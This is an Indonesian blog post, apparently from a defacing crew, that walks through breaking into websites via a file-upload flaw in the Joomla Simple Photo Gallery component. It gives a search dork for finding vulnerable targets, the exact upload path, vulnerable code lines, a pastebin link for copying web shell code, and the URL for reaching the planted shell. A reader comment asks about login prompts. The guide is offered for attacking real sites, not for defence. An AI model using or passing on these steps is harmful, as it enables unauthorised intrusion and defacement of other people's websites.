Home > Defacing > Deface Menggunakan Joomla Simple Photo Gallery Shell Upload

Deface Menggunakan Joomla Simple Photo Gallery Shell Upload

Friday, January 27, 2017 Defacing

Dork : inurl:com_simplephotogallery

Exploit : /administrator/components/com_simplephotogallery/lib/uploadFile.php

Step by Step :
Dorking
Pilih web Masukkan Exploit Jadi
Target.com/administrator/components/com_simplephotogallery/lib/uploadFile.php

Kalo Web Vuln akan bacaan seperti ini :

20.   $fieldName = 'uploadfile';
87.      $fileTemp = $_FILES[$fieldName]['tmp_name'];
94.         $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96.      if(! move_uploaded_file($fileTemp, $uploadPath))

Not Found ? Atau 404 ? Tinggalin deh -_-

Silahkan Copy Code di

http://pastebin.com/raw/jSrVDRNR

Name Shell jadi Random contoh ->Shell__g4nt3n9.php
Shell Access : http://target.com/Shell__(RandomString).php

Link Sumber : http://familyattackcyber.blogspot.co.id/2017/01/deface-joomla-simple-photo-gallery_26.html#ixzz4WzMK1vPl

1 comment:

UnknownFebruary 21, 2017 at 9:37 AM
numpang tanya stah , klo sudah dikasih /administrator/components/com_simplephotogallery/lib/uploadFile.php trus di site di minta username & pass , bisa di bilang vuln kah ?
ReplyDelete
Replies

Add comment

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )

CowoKerensTeam

Header Ads

Deface Menggunakan Joomla Simple Photo Gallery Shell Upload

Post a Comment

1 comment:

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts

CowoKerensTeam

Header Ads

Deface Menggunakan Joomla Simple Photo Gallery Shell Upload

Related Posts

Post a Comment

1 comment:

Follow Us

Facebook

Popular Posts

Sponsor

Comments

Labels

Blog Archive

Recent Posts

Popular Posts